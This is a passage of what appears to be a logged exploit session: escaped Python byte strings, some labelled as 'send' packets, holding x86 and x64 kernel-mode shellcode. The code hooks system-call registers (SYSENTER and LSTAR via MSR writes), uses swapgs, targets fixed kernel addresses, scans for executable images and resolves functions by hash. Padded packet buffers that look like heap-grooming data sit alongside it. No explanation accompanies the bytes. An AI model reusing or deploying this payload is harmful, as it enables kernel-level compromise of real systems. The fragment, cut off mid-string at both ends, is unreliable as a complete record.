xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 